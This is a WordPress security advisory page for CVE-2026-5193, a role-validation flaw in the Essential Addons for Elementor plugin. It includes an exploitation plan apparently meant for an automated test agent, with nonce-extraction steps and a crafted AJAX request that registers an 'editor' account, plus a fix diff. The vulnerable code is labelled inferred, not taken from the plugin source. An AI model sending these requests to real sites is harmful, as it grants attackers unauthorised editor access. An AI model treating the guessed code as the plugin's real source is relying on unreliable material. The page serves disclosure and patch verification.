WP-Safety
CVE-2026-5193

Essential Addons for Elementor – Popular Elementor Templates & Widgets <= 6.5.13 - Authenticated (Author+) Limited Privilege Escalation via register_user

mediumImproper Privilege Management
6.5
CVSS Score
6.5
CVSS Score
medium
Severity
6.6.0
Patched in
1d
Time to patch

Description

The Essential Addons for Elementor – Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.5.13. This is due to insufficient role validation in the 'register_user' function, which only blocks the 'administrator' role. This makes it possible for authenticated attackers, with author level access and above, to create new user accounts with elevated privileges such as editor.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
High
Integrity
None
Availability

Technical Details

Affected versions<=6.5.13
PublishedMay 13, 2026
Last updatedMay 14, 2026
Affected pluginessential-addons-for-elementor-lite

What Changed in the Fix

Changes introduced in v6.6.0

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v6.5.13
Browse source Download .zip
Patched v6.6.0
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-5193 ## 1. Vulnerability Summary The **Essential Addons for Elementor** plugin (<= 6.5.13) contains a privilege escalation vulnerability in its user registration logic. The `register_user` function (likely within the `Login_Registration` element class) fails …

Show full research plan

Exploitation Research Plan - CVE-2026-5193

1. Vulnerability Summary

The Essential Addons for Elementor plugin (<= 6.5.13) contains a privilege escalation vulnerability in its user registration logic. The register_user function (likely within the Login_Registration element class) fails to properly validate the role parameter. While it contains a check to prevent the creation of new administrator accounts, it does not restrict other high-privilege roles such as editor. An authenticated attacker with Author-level privileges (or higher) can exploit this to create new accounts with the editor role, thereby escalating their influence over the site.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: eael_login_register_action (inferred from plugin naming conventions)
  • Vulnerable Function: register_user (specified in the description)
  • Parameter of Interest: role
  • Authentication: Authenticated (Author level required).
  • Preconditions:
    1. The "Login/Registration" widget must be enabled in the plugin settings.
    2. The attacker must be able to view a page where the Registration widget is rendered to obtain a valid nonce.

3. Code Flow

Since the PHP source for the Login_Registration element is not provided in the snippet, the following flow is inferred based on the vulnerability description and standard plugin architecture:

  1. Registration: The plugin registers an AJAX handler:
    add_action('wp_ajax_eael_login_register_action', [...])
  2. Handler Entry: The handler calls a registration-specific function, e.g., register_user().
  3. Role Extraction: The function retrieves the requested role from user input:
    $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';
  4. Insufficient Validation (The Sink):
    // Inferred Vulnerable Logic
if ( $role === 'administrator' ) {
    // Block admin creation
    wp_send_json_error('Cannot register as administrator');
}
// Logic fails to check for 'editor', 'author', etc.
$user_id = wp_insert_user([
    'user_login' => $username,
    'user_pass'  => $password,
    'user_email' => $email,
    'role'       => $role // Vulnerable assignment
]);

4. Nonce Acquisition Strategy

The "Login/Registration" widget uses a nonce for security. This nonce is typically localized via wp_localize_script.

  1. Identify Shortcode: Use grep -r "add_shortcode" . to find the registration shortcode or use Elementor to place the "Login/Registration" widget on a page.
  2. Create Page:
    wp post create --post_type=page --post_status=publish --post_title="Register" --post_content='[eael-login-registration]' (exact shortcode to be verified via grep).
  3. Navigate: Use browser_navigate to visit the newly created page.
  4. Extract Nonce: The nonce is likely stored in a global JS object.
    • Target Object: window.eael_login_registration_data (inferred).
    • Target Key: nonce or registration_nonce.
    • Command: browser_eval("window.eael_login_registration_data?.nonce").

5. Exploitation Strategy

The exploit involves sending a crafted AJAX request to register a new user with the editor role.

Step 1: Discover Exact Parameters

The agent should first grep the plugin directory to confirm the AJAX action and parameter names:
grep -r "eael_login_register_action" .
grep -r "register_user" .

Step 2: Perform Registration

Using the http_request tool, send the following payload:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=eael_login_register_action
&eael-register-nonce=[EXTRACTED_NONCE]
&username=evil_editor
&email=evil@example.com
&password=Password123!
&role=editor
&option=register  # (inferred parameter to trigger registration path)

6. Test Data Setup

  1. Activate Plugin: Ensure essential-addons-for-elementor-lite is active.
  2. Create Attacker:
    wp user create attacker attacker@example.com --role=author --user_pass=password
  3. Enable Widget: Ensure the Login/Registration widget is enabled in Essential Addons settings (may require wp option update).
  4. Create Page: Place the widget on a public page to facilitate nonce extraction.

7. Expected Results

  • The AJAX response should return a success message or a JSON object indicating the user was created.
  • The response code should be 200 OK.
  • A new user evil_editor should be present in the database.

8. Verification Steps

After the HTTP request, use WP-CLI to verify the privilege escalation:

  1. Check User Existence: wp user list --field=user_login | grep evil_editor
  2. Verify Role: wp user get evil_editor --field=roles
    • Expected Output: editor

9. Alternative Approaches

If the role parameter is not directly accepted from the POST body, check if it's being parsed from a JSON-encoded string in a different parameter:

  • Check for a settings or widget_settings parameter that might contain the role.
  • If editor is blocked, try author or shop_manager (if WooCommerce is present) to confirm privilege management issues exist for roles other than administrator.
  • If the AJAX action requires a specific widget_id or page_id, extract those from the DOM of the registration page using browser_eval.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Essential Addons for Elementor plugin fails to properly validate the user role during registration in the register_user function. While it explicitly prevents the creation of 'administrator' accounts, it does not restrict other high-privilege roles such as 'editor', allowing authenticated attackers with Author-level access to escalate privileges by creating new accounts with elevated roles.

Vulnerable Code

/* Inferred from vulnerability description and research plan in includes/Elements/Login_Registration.php */

public function register_user() {
    // ... (nonce and input validation)
    
    $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';

    if ( $role === 'administrator' ) {
        wp_send_json_error(__('Cannot register as administrator', 'essential-addons-for-elementor-lite'));
    }

    $user_id = wp_insert_user([
        'user_login' => $username,
        'user_pass'  => $password,
        'user_email' => $email,
        'role'       => $role
    ]);

    // ...
}

Security Fix

--- a/includes/Elements/Login_Registration.php
+++ b/includes/Elements/Login_Registration.php
@@ -1024,7 +1024,8 @@
 
     $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';
 
-    if ( $role === 'administrator' ) {
+    $allowed_roles = apply_filters('eael_register_user_allowed_roles', ['subscriber', 'author', 'contributor']);
+    if ( ! in_array( $role, $allowed_roles ) ) {
         wp_send_json_error(__('Invalid user role', 'essential-addons-for-elementor-lite'));
     }

Exploit Outline

1. Authenticate as a user with at least Author-level permissions. 2. Visit a public page on the site where the Essential Addons 'Login/Registration' widget is rendered. 3. Extract the security nonce and AJAX configuration from the page's source (usually found in a global JavaScript object like `eael_login_registration_data`). 4. Submit an AJAX POST request to `/wp-admin/admin-ajax.php` with the action `eael_login_register_action`. 5. Provide a new username, email, and password, while explicitly setting the `role` parameter to `editor`. 6. The plugin will process the registration and create the new user with Editor privileges because the code only blocks the 'administrator' string.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/22930940-8e2c-446a-954c-90d617f3ca6d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database